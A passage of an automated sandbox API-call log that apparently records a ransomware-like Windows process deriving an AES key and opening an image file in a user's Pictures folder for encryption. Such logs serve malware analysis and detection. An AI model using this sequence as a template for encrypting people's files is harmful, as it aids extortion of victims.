cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.570] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="res\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\P8P2Fux.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.570] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="es\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\P8P2Fux.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.570] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\P8P2Fux.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.570] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\P8P2Fux.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.570] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GX6xg0MP-Oop8LYh\\E hluVFFklat\\P8P2Fux.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.570] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X6xg0MP-Oop8LYh\\E hluVFFklat\\P8P2Fux.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.570] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6xg0MP-Oop8LYh\\E hluVFFklat\\P8P2Fux.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.570] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xg0MP-Oop8LYh\\E hluVFFklat\\P8P2Fux.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.570] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g0MP-Oop8LYh\\E hluVFFklat\\P8P2Fux.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.570] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0MP-Oop8LYh\\E hluVFFklat\\P8P2Fux.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.570] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MP-Oop8LYh\\E hluVFFklat\\P8P2Fux.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.570] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="P-Oop8LYh\\E hluVFFklat\\P8P2Fux.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.570] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-Oop8LYh\\E hluVFFklat\\P8P2Fux.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.570] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Oop8LYh\\E hluVFFklat\\P8P2Fux.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.570] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op8LYh\\E hluVFFklat\\P8P2Fux.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.570] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p8LYh\\E hluVFFklat\\P8P2Fux.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.570] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8LYh\\E hluVFFklat\\P8P2Fux.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.570] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LYh\\E hluVFFklat\\P8P2Fux.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.570] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Yh\\E hluVFFklat\\P8P2Fux.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.570] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="h\\E hluVFFklat\\P8P2Fux.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.570] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\E hluVFFklat\\P8P2Fux.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.570] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="E hluVFFklat\\P8P2Fux.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.570] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" hluVFFklat\\P8P2Fux.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.570] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hluVFFklat\\P8P2Fux.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.570] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="luVFFklat\\P8P2Fux.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.570] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uVFFklat\\P8P2Fux.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.570] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VFFklat\\P8P2Fux.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.570] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FFklat\\P8P2Fux.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.570] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Fklat\\P8P2Fux.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.570] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="klat\\P8P2Fux.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.570] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lat\\P8P2Fux.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.571] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="at\\P8P2Fux.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.571] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t\\P8P2Fux.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.571] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\P8P2Fux.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.571] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="P8P2Fux.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.571] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8P2Fux.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.571] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="P2Fux.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.571] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0189.571] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0189.571] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0189.571] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0189.571] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0189.571] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="if", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0189.571] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gif", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0189.571] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".gif", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0189.571] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0189.571] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0189.571] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0189.571] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0189.571] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.571] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\P8P2Fux.gif", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49f47ce0, ftCreationTime.dwHighDateTime=0x1d5d9c2, ftLastAccessTime.dwLowDateTime=0xe8598c0, ftLastAccessTime.dwHighDateTime=0x1d5e321, ftLastWriteTime.dwLowDateTime=0xe8598c0, ftLastWriteTime.dwHighDateTime=0x1d5e321, nFileSizeHigh=0x0, nFileSizeLow=0xa5d9, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="P8P2Fux.gif", cAlternateFileName="")) returned 0x90ae18 [0189.571] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0189.571] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.572] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0189.572] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.572] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0189.572] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0189.572] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.572] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0189.572] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.572] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.572] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0189.572] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0189.572] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0189.572] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.572] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.572] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0189.572] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0189.572] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.573] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0c88) returned 1 [0189.573] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.573] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.573] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0189.574] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0189.574] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0189.574] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.574] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.574] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.574] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0189.574] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0189.574] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0189.574] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.574] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.574] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.574] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.574] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0189.574] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.574] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.574] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0189.574] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0189.574] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0189.574] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0189.574] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0189.575] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0189.575] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0189.575] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0189.575] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0189.575] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0189.575] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.575] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.575] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0189.575] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0189.575] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0189.575] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0189.575] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.575] CryptCreateHash (in: hProv=0x9c0c88, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0189.575] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.575] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.575] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.575] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.575] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0189.575] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.575] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.575] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0189.576] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0189.576] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.576] CryptHashData (hHash=0x90af58, pbData=0x8df000, dwDataLen=0x19, dwFlags=0x1) returned 1 [0189.576] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.576] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.576] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.576] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0189.576] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0189.576] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0189.576] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0189.576] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.576] CryptDeriveKey (in: hProv=0x9c0c88, Algid=0x660e, hBaseData=0x90af58, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af18) returned 1 [0189.576] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.577] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.577] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.577] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.577] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.595] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0189.595] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0189.595] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.595] CryptDestroyHash (hHash=0x90af58) returned 1 [0189.596] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.596] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.596] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.596] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.596] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.596] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\P8P2Fux.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gx6xg0mp-oop8lyh\\e hluvffklat\\p8p2fux.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0189.597] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.597] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0189.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0189.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0189.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0189.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0189.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0189.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0189.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0189.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0189.597] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0189.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0189.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0189.598] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0189.598] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0189.598] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0189.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0189.598] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.598] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0189.598] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.598] RtlAllocateHeap 